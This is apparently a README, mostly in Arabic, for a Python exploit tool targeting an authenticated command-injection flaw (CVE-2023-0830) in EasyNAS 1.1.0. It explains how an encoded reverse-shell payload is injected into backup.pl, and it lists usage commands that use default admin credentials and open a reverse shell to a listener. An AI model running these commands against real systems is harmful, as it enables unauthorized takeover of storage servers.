
استغلال لـ EasyNAS الإصدار 1.1.0. الثغرة المستغلة هي خلل حقن أوامر، والذي يتطلب مصادقة.
هذا النص البرمجي بلغة Python هو أداة استغلال قوية لإصدار EasyNAS 1.1.0 مع وظائف محسّنة، تتضمن مستمعًا مدمجًا. الثغرة المستغلة هي خلل في حقن الأوامر، ويتطلب استغلالها مصادقة.
ينشئ النص البرمجي جلسة مع الخادم الهدف، ثم يرسل طلب تسجيل دخول باستخدام بيانات اعتماد يقدمها المستخدم. بعد المصادقة الناجحة، يُنشئ النص البرمجي حمولة (payload) تؤدي عند تنفيذها إلى فتح اتصال صدفي عكسي (reverse shell) بعنوان IP ومنفذ يحددهما المستخدم. تُرمَّز هذه الحمولة بتشفير URL و Base64 ثم تُحقن في ملف backup.pl على الخادم عبر طلب GET مُصمم بعناية.
Ivan Spiridonov (xbz0n) https://xbz0n.sh
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin
python3 CVE-2023-0830-v2.py 192.168.0.108:1443 admin admin --mode reverse --lhost 192.168.0.100 --lport 4444
--mode {shell,reverse} Exploitation mode: shell (integrated reverse shell) or reverse (external listener)
--lhost IP_ADDRESS IP address for the reverse shell listener (auto-detected by default)
--lport PORT Port for the reverse shell listener (default: 4444)
--protocol {http,https} Protocol to use (default: https)
--verbose Enable verbose output
--shell {bash,sh,python} Specify the shell type to use with integrated listener (default: bash)
هذا النص البرمجي لأغراض تعليمية ولاختبار الاختراق المصرح به فقط. احرص دائمًا على الحصول على إذن صريح قبل تنفيذ أي اختبارات اختراق ضد شبكة أو نظام.
يرجى استخدامه بمسؤولية.